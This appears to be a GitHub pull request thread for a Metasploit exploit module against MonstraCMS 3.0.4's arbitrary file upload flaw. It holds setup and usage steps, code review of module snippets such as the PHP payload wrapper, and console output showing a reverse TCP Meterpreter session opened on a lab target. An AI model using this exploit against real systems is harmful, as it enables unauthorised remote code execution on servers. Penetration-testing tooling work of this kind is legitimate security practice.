Monstra fileupload exec
rapid7/metasploit-framework pull request #10231
Opened 2018-06-30 06:34 UTC by security-prince

## Description
MonstraCMS 3.0.4 allows users to upload Arbitrary files which leads to a remote command execution on the remote server, an attacker may choose to upload a file containing PHP code and run this code by accessing the resulting PHP file.
This module was tested against MonstraCMS 3.0.4.
Additional information and vulnerabilities can be viewed on Exploit-DB [43348](https://www.exploit-db.com/exploits/43348/).

## Vulnerable Application 
Available at [Exploit-DB](https://www.exploit-db.com/apps/23663fc7b47c4c1e476b793ea53660bc-monstra-3.0.4.zip)

### Vulnerable Application Installation Setup.
 1. Download Application : `https://www.exploit-db.com/apps/23663fc7b47c4c1e476b793ea53660bc-monstra-3.0.4.zip`
 2. Extract : `23663fc7b47c4c1e476b793ea53660bc-monstra-3.0.4.zip`
 3. Move In WebDirectory : `C:\xampp\htdocs\`
 4. Now Visit : http://localhost/
 8. Setup DB creds and other thins which is essential for Monstra CMS.

## Verification Steps

 1. Install the application
 2. Start msfconsole
 3. Do: `use exploit/multi/http/monstra_fileupload_exec`
 4. Do: `set rport <port>`
 5. Do: `set rhost <ip>`
 6. Do: `set targeturi monstra`
 7. Do: `set username root`
 8. Do: `set password password`
 9. Do: `check`
```
[*] 10.22.1.10:80 The target appears to be vulnerable.
```
 10. Do: `set lport <port>`
 11. Do: `set lhost <ip>`
 12. Do: `exploit`
 13. You should get a shell.

## Scenarios
### Monstra CMS on Windows Target
```                                                                                                                                    
meterpreter >
```

2018-06-30 06:44 UTC, bcoles requested changes
Please fix indentation, ensuring two spaces are used

2018-06-30 06:44 UTC, bcoles commented on documentation/modules/exploit/multi/http/monstra_fileupload_exec.md
> + 8. Setup DB creds and other thins which is essential for Monstra CMS.
https://www.youtube.com/watch?v=VOaZbaPzdsk

2018-06-30 06:44 UTC, bcoles commented on documentation/modules/exploit/multi/http/monstra_fileupload_exec.md
> +meterpreter >
Example module output please

2018-06-30 06:44 UTC, bcoles commented on modules/exploits/multi/http/monstra_fileupload_exec.rb
> +          OptString.new('PASSWORD', [ true, "Password to authenticate with", 'password'])
Is this the default password?

2018-06-30 06:44 UTC, bcoles commented on modules/exploits/multi/http/monstra_fileupload_exec.rb
> +          OptString.new('USERNAME', [ true, "Username to authenticate with", 'root']),
Is this the default username?

2018-06-30 06:44 UTC, bcoles commented on modules/exploits/multi/http/monstra_fileupload_exec.rb
> +          'uri' => normalize_uri(uri, 'admin', '/index.php?id=filesmanager'),
`vars_get` is preferred

`vars_get' => 'id=filesmanager'`

2018-06-30 06:46 UTC, bcoles commented
Please address `msftidy` warnings.

```
[*] Running msftidy.rb in ./.git/hooks/post-merge mode
--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/exploits/multi/http/monstra_fileupload_exec.rb:25 - [WARNING] Spaces at EOL
modules/exploits/multi/http/monstra_fileupload_exec.rb:77 - [WARNING] Spaces at EOL
modules/exploits/multi/http/monstra_fileupload_exec.rb:79 - [WARNING] Space-Tab mixed indent: "\t return CheckCode::Vulnerable\n"
modules/exploits/multi/http/monstra_fileupload_exec.rb:79 - [WARNING] Tabbed indent: "\t return CheckCode::Vulnerable\n"
modules/exploits/multi/http/monstra_fileupload_exec.rb:106 - [WARNING] Spaces at EOL
modules/exploits/multi/http/monstra_fileupload_exec.rb:114 - [WARNING] Spaces at EOL
modules/exploits/multi/http/monstra_fileupload_exec.rb:116 - [WARNING] Spaces at EOL
modules/exploits/multi/http/monstra_fileupload_exec.rb:129 - [WARNING] Spaces at EOL
modules/exploits/multi/http/monstra_fileupload_exec.rb:130 - [WARNING] Tabbed indent: "\t#Login Function Execute and Return Cookies\n"
modules/exploits/multi/http/monstra_fileupload_exec.rb:133 - [WARNING] Tabbed indent: "\t#Random payload name.\n"
modules/exploits/multi/http/monstra_fileupload_exec.rb:134 - [WARNING] Spaces at EOL
modules/exploits/multi/http/monstra_fileupload_exec.rb:135 - [WARNING] Spaces at EOL
modules/exploits/multi/http/monstra_fileupload_exec.rb:146 - [WARNING] Spaces at EOL
modules/exploits/multi/http/monstra_fileupload_exec.rb:152 - [WARNING] Spaces at EOL
modules/exploits/multi/http/monstra_fileupload_exec.rb:153 - [WARNING] Spaces at EOL
modules/exploits/multi/http/monstra_fileupload_exec.rb:160 - [WARNING] Spaces at EOL
modules/exploits/multi/http/monstra_fileupload_exec.rb:172 - [WARNING] Tabbed indent: "\t# Cleanup delete payload after get meterpreter.\n"
modules/exploits/multi/http/monstra_fileupload_exec.rb - [INFO] Please use vars_get in send_request_cgi: send_request_cgi({ 'uri' => normalize_uri(uri, 'admin', '/index.php?id=filesmanager'
modules/exploits/multi/http/monstra_fileupload_exec.rb - [INFO] Please use vars_get in send_request_cgi: send_request_cgi({ 'uri' => normalize_uri(uri, 'admin', '/index.php?id=filesmanager'
------------------------------------------------------------------------
------------------------------------------------------------------------
[*] This merge contains modules failing msftidy.rb
[*] Please fix this if you intend to publish these
[*] modules to a popular metasploit-framework repo
------------------------------------------------------------------------
```

2018-06-30 07:10 UTC, bcoles commented on modules/exploits/multi/http/monstra_fileupload_exec.rb
> +          ['Monstra CMS 3.0.4', { }],
Prior versions also?

2018-06-30 07:10 UTC, bcoles commented on modules/exploits/multi/http/monstra_fileupload_exec.rb
> +    res = nil
No need to define `res` here

2018-06-30 07:10 UTC, bcoles commented on modules/exploits/multi/http/monstra_fileupload_exec.rb
> +    end
The module should return `CheckCode::Safe` when neither `Vulnerable` or `Detected` are returned.

2018-06-30 07:10 UTC, bcoles commented on modules/exploits/multi/http/monstra_fileupload_exec.rb
> +    if res.body =~ /<\/a> – Version (.*.4)/i
This could be cleaned up by using `Gem::Version` for version comparison.

Also, `%r{}` notation can be used for regex to avoid escaping.

```ruby
%r{</a> – Version (.*.4)}i
```

Also, I noticed `–` not `-` is used. Is this correct?

Also, why are you checking for `4` ?

2018-06-30 07:10 UTC, bcoles commented on modules/exploits/multi/http/monstra_fileupload_exec.rb
> +      vprint_status("Monstra CMS: " + $1)
String interpolation is preferred over concatenation.

```ruby
vprint_status("Monstra CMS version: #{$1}")
```

2018-06-30 07:10 UTC, bcoles commented on modules/exploits/multi/http/monstra_fileupload_exec.rb
> +        fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?
`Failure::Unreachable` is more appropriate

2018-06-30 07:10 UTC, bcoles commented on modules/exploits/multi/http/monstra_fileupload_exec.rb
> +        fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?
`Failure::Unreachable` is more appropriate

2018-06-30 07:13 UTC, security-prince commented on modules/exploits/multi/http/monstra_fileupload_exec.rb
> +          OptString.new('PASSWORD', [ true, "Password to authenticate with", 'password'])
Noo... during setup u can set anything ....

2018-06-30 07:13 UTC, security-prince commented on modules/exploits/multi/http/monstra_fileupload_exec.rb
> +          OptString.new('USERNAME', [ true, "Username to authenticate with", 'root']),
Noo... during setup u can set anything ....

2018-06-30 07:13 UTC, security-prince commented on modules/exploits/multi/http/monstra_fileupload_exec.rb
> +          'uri' => normalize_uri(uri, 'admin', '/index.php?id=filesmanager'),
thanks for tip ...

2018-06-30 07:14 UTC, security-prince commented on documentation/modules/exploit/multi/http/monstra_fileupload_exec.md
> +meterpreter >
sure

2018-06-30 07:16 UTC, bcoles commented on modules/exploits/multi/http/monstra_fileupload_exec.rb
> +          OptString.new('PASSWORD', [ true, "Password to authenticate with", 'password'])
It's best to set `''` as the default if the application does not have a default.

2018-06-30 07:16 UTC, bcoles commented on modules/exploits/multi/http/monstra_fileupload_exec.rb
> +          OptString.new('USERNAME', [ true, "Username to authenticate with", 'root']),
It's best to set `''` as the default if the application does not have a default.

2018-07-06 20:02 UTC, wchen-r7 commented
Hi @security-prince, we will go ahead and make the changes for you, and then land it. Thanks for the submission! :-)

2018-07-07 11:55 UTC, touhidshaikh commented
@wchen-r7 , thanks for this. Sorry for late.

2018-07-07 12:00 UTC, bcoles commented
msftidy is going to fail, due to some rogue tabs (instead of spaces)

2018-07-07 12:05 UTC, touhidshaikh commented
i ll update it ... as soon as possible.. thanks for pointing this very
quickly. :)

On Sat, Jul 7, 2018, 17:30 Brendan Coles <notifications@github.com> wrote:

> msftidy is going to fail, due to some rogue tabs (instead of spaces)
>
> —
> You are receiving this because you commented.
> Reply to this email directly, view it on GitHub
> <https://github.com/rapid7/metasploit-framework/pull/10231#issuecomment-403210817>,
> or mute the thread
> <https://github.com/notifications/unsubscribe-auth/AY-KLKwmm5vkie6mU0JLUx0bteknw2YOks5uEKLygaJpZM4U93bD>
> .
>

2018-07-09 06:37 UTC, bcoles commented
Both instances of `'vars_get' => 'id=filesmanager'` are missing a trailing comma.

2018-07-09 06:38 UTC, bcoles commented
Please run `./tools/dev/msftidy.rb modules/exploits/multi/http/monstra_fileupload_exec.rb` and fix errors.

2018-07-09 06:57 UTC, touhidshaikh commented
@bcoles , my msftidy.rb not showing any error strange.

2018-07-09 07:00 UTC, touhidshaikh commented
@bcoles , i need to talk to you for another MSF module.

2018-07-09 17:34 UTC, space-r7 commented
I made some changes with some trailing commas and the regex in the check method. @bcoles Are there any other changes that you would like made before I land this?

2018-07-10 18:06 UTC, wvu-r7 commented on modules/exploits/multi/http/monstra_fileupload_exec.rb
> +    evilbyte = "<?php #{payload.encode}; ?>"
Yep, one is the accessor, and one calls the method. We'd want any final encoded payload, not the method that does the encoding.

2018-07-10 18:06 UTC, wvu-r7 commented on modules/exploits/multi/http/monstra_fileupload_exec.rb
> +    evilbyte = "<?php #{payload.encode}; ?>"
(Both work, but one is more correct.)

2018-07-10 19:34 UTC, merged

2018-07-10 19:36 UTC, space-r7 commented
Made changes and tested:

```
msf5 > use exploit/multi/http/monstra_fileupload_exec 
msf5 exploit(multi/http/monstra_fileupload_exec) > set rhosts 192.168.37.144
rhosts => 192.168.37.144
msf5 exploit(multi/http/monstra_fileupload_exec) > set rport 80
rport => 80
msf5 exploit(multi/http/monstra_fileupload_exec) > set targeturi monstra
targeturi => monstra
msf5 exploit(multi/http/monstra_fileupload_exec) > set username testMonstra
username => testMonstra
msf5 exploit(multi/http/monstra_fileupload_exec) > set password monstraPassword
password => monstraPassword
msf5 exploit(multi/http/monstra_fileupload_exec) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/http/monstra_fileupload_exec) > set lport 4444
lport => 4444
msf5 exploit(multi/http/monstra_fileupload_exec) > check
[*] 192.168.37.144:80 The target appears to be vulnerable.
msf5 exploit(multi/http/monstra_fileupload_exec) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[+] Authentication successful : [ testMonstra : monstraPassword ]
[*] Executing Payload 
[*] Sending stage (37775 bytes) to 192.168.37.144
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.144:51487) at 2018-07-10 14:32:44 -0500
[+] Deleted NdwBGrTZ.PHP

meterpreter > sysinfo
Computer    : MSEDGEWIN10
OS          : Windows NT MSEDGEWIN10 10.0 build 17134 (Windows 10) i586
Meterpreter : php/windows
meterpreter > getuid
Server username: IEUser (0)
```

2018-07-10 19:38 UTC, space-r7 commented
## Release Notes

MonstraCMS 3.0.4 allows users to upload arbitrary files which leads to remote command execution on the remote server.